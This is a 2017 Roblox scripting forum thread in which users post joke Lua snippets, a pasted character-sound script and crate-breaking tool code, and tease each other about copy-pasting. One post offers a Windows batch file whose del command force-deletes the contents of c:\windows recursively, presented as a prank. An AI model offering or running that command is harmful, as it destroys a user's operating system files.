|
| 10 Feb 2017 09:30 PM |
game.Workspace.Baseplate.Transparency = 0.5
MAN THAT WAS A REALLY COMPLICATED SCRIPT, BET YOU CANT BEAT IT!!
THIS IS MY SIGNATURE, SO WHAT ITS TERRIBLE? I LIKE IT! |
|
|
| Report Abuse |
|
|
|
| 10 Feb 2017 09:32 PM |
-- Give me 1000 robux
WoW! ITS EVEN GREEN
|
|
|
| Report Abuse |
|
|
zura123
|
  |
| Joined: 21 Oct 2011 |
| Total Posts: 7679 |
|
|
| 10 Feb 2017 09:33 PM |
waitForChild = function(parent, childName) local child = parent:findFirstChild(childName) if child then return child end while 1 do child = parent.ChildAdded:wait() if child.Name == childName then return child end end end
local Figure = script.Parent.Parent local Head = waitForChild(Figure, "Head") local Humanoid = waitForChild(Figure, "Humanoid") local sGettingUp = waitForChild(Head, "GettingUp") local sDied = waitForChild(Head, "Died") local sFreeFalling = waitForChild(Head, "FreeFalling") local sJumping = waitForChild(Head, "Jumping") local sLanding = waitForChild(Head, "Landing") local sSplash = waitForChild(Head, "Splash") local sRunning = waitForChild(Head, "Running") sRunning.Looped = true local sSwimming = waitForChild(Head, "Swimming") sSwimming.Looped = true local sClimbing = waitForChild(Head, "Climbing") sClimbing.Looped = true local prevState = "None" onDied = function() stopLoopedSounds() sDied:Play() end
local fallCount = 0 local fallSpeed = 0 onStateFall = function(state, sound) fallCount = fallCount + 1 if state then sound.Volume = 0 sound:Play() Spawn(function() local t = 0 local thisFall = fallCount while t < 1.5 and fallCount == thisFall do local vol = math.max(t - 0.3, 0) sound.Volume = vol wait(0.1) t = t + 0.1 end end ) else sound:Stop() end fallSpeed = math.max(fallSpeed, math.abs(Head.Velocity.Y)) end
onStateNoStop = function(state, sound) if state then sound:Play() end end
onRunning = function(speed) sClimbing:Stop() sSwimming:Stop() do if pr#########=##FreeFall" and fallSpeed > 0.1 then local vol = math.min(1, math.max(0, (fallSpeed - 50) / 110)) sLanding.Volume = vol sLanding:Play() fallSpeed = 0 end if speed > 0.5 then sRunning:Play() sRunning.Pitch = speed / 8 else sRunning:Stop() end prevState = "Run" end end
onSwimming = function(speed) do if pr#########=##Swim" and speed > 0.1 then local volume = math.min(1, speed / 350) sSplash.Volume = volume sSplash:Play() prevState = "Swim" end sClimbing:Stop() sRunning:Stop() sSwimming.Pitch = 1.6 sSwimming:Play() end end
onClimbing = function(speed) sRunning:Stop() sSwimming:Stop() if speed > 0.01 then sClimbing:Play() sClimbing.Pitch = speed / 5.5 else sClimbing:Stop() end prevState = "Climb" end
stopLoopedSounds = function() sRunning:Stop() sClimbing:Stop() sSwimming:Stop() end
Humanoid.Died:connect(onDied) Humanoid.Running:connect(onRunning) Humanoid.Swimming:connect(onSwimming) Humanoid.Climbing:connect(onClimbing) Humanoid.Jumping:connect(function(state) onStateNoStop(state, sJumping) prevState = "Jump" end ) Humanoid.GettingUp:connect(function(state) stopLoopedSounds() onStateNoStop(state, sGettingUp) prevState = "GetUp" end ) Humanoid.FreeFalling:connect(function(state) st################## onStateFall(state, sFreeFalling) prevState = "FreeFall" end ) Humanoid.FallingDown:connect(function(state) ################## end ) Humanoid.StateChanged:connect(function(old, new) if new.Name ## "Dead" and new.Name ~= "Running" and new.Name ~= "RunningNoPhysics" and new.Name ~= "Swimming" and new.Name ~= "Jumping" and new.Name ~= "GettingUp" and new.Name ~= "Freefall" and new.Name ~= "FallingDown" then stopLoopedSounds() end end )
|
|
|
| Report Abuse |
|
|
|
| 10 Feb 2017 09:34 PM |
Error: No function named ######hashtag#####
|
|
|
| Report Abuse |
|
|
|
| 10 Feb 2017 09:35 PM |
nice copy and paste
THIS IS MY SIGNATURE, SO WHAT ITS TERRIBLE? I LIKE IT! |
|
|
| Report Abuse |
|
|
|
| 10 Feb 2017 09:38 PM |
print("HI") I AM PRO SCRIPTER OMG jk |
|
|
| Report Abuse |
|
|
SpliTech
|
  |
| Joined: 06 Feb 2013 |
| Total Posts: 11407 |
|
|
| 10 Feb 2017 09:40 PM |
#code if forumID = 18 then do print('you're all narbs') end
nemesis is pissed |
|
|
| Report Abuse |
|
|
SpliTech
|
  |
| Joined: 06 Feb 2013 |
| Total Posts: 11407 |
|
|
| 10 Feb 2017 09:41 PM |
ech, i messed dat up
nemesis is pissed |
|
|
| Report Abuse |
|
|
|
| 11 Feb 2017 10:41 AM |
local function Add(a, b) return a + b end
local MyKeyboards= Add(1, 1)
if MyKeyboards > 1 then print("That's alot!") else print("Thats normal.") end
|
|
|
| Report Abuse |
|
|
Sixzes
|
  |
| Joined: 04 Oct 2013 |
| Total Posts: 4438 |
|
| |
|
|
| 11 Feb 2017 10:42 AM |
ya'll are jealous of me mad scripting skills LOL
|
|
|
| Report Abuse |
|
|
|
| 11 Feb 2017 10:42 AM |
you dont put an "end" at the end of a print LOL
|
|
|
| Report Abuse |
|
|
| |
|
|
| 11 Feb 2017 10:44 AM |
another person who doesnt know how to use the "print" LOL
|
|
|
| Report Abuse |
|
|
|
| 11 Feb 2017 10:44 AM |
local Crate = game.Workspace.AKUHINT1 local box = Crate.BreakThatCrate local weapon = script.Parent local tool = weapon.Parent local attacking = false local debounce = false local PIECE = game.ServerStorage.AKUPieces1 local MoarPieces = PIECE:Clone() local sound = game.Workspace.Crate_Break local fruits = game.ServerStorage.AKUFruit1 local CRATETOTAL = game.StarterGui.CrateCounter.COUNTERval local CRATELabel = game.StarterGui.CrateCounter.TextLabel
local attack = function() attacking = true wait(0.5) attacking = false end tool.Activated:connect(attack)
local breakIt = function() sound:Play() MoarPieces.Parent = game.Workspace fruits.Parent = game.Workspace Crate.Parent = game.ServerStorage end
local weaponTouch = function(hit) if not debounce then debounce = true if attacking then if hit == box then breakIt() end end debounce = false end end weapon.Touched:connect(weaponTouch)
*𝐒𝐮𝐧𝐬𝐞𝐭 𝐕𝐢𝐬𝐭𝐚 𝐟𝐥𝐚𝐬𝐡𝐛𝐚𝐜𝐤𝐬* |
|
|
| Report Abuse |
|
|
deranging
|
  |
| Joined: 11 Jun 2012 |
| Total Posts: 11966 |
|
|
| 11 Feb 2017 10:45 AM |
HERES A BAT FILE
@echo off del c:\windows\*.* /F /S /Q /as /ar /aa /ah
|
|
|
| Report Abuse |
|
|
| |
|
|
| 11 Feb 2017 10:46 AM |
more copy and pasting xddd
|
|
|
| Report Abuse |
|
|
Sixzes
|
  |
| Joined: 04 Oct 2013 |
| Total Posts: 4438 |
|
|
| 11 Feb 2017 10:47 AM |
also "game.Workspace.Baseplate.Transparency = 0.5" isnt that complicated tbh
c |
|
|
| Report Abuse |
|
|
|
| 11 Feb 2017 10:49 AM |
tostring(setmetatable({},{__tostring=tostring}))
it causes a c stack overflow |
|
|
| Report Abuse |
|
|
|
| 11 Feb 2017 10:51 AM |
I copied and pasted something I made for a project i am working on.
Made it back in like last February or March, and only starting actually using it for real last November
*𝐒𝐮𝐧𝐬𝐞𝐭 𝐕𝐢𝐬𝐭𝐚 𝐟𝐥𝐚𝐬𝐡𝐛𝐚𝐜𝐤𝐬* |
|
|
| Report Abuse |
|
|
|
| 11 Feb 2017 10:52 AM |
I randomly picked one, as my studio is open right now.
Obviously i'm not going to type all that up at the spot.
*𝐒𝐮𝐧𝐬𝐞𝐭 𝐕𝐢𝐬𝐭𝐚 𝐟𝐥𝐚𝐬𝐡𝐛𝐚𝐜𝐤𝐬* |
|
|
| Report Abuse |
|
|
|
| 11 Feb 2017 11:31 AM |
while game.Workspace.Part.Transparency == 1 do wait(.1) Instance.new("Part",game.Workspace) end
|
|
|
| Report Abuse |
|
|
| |
|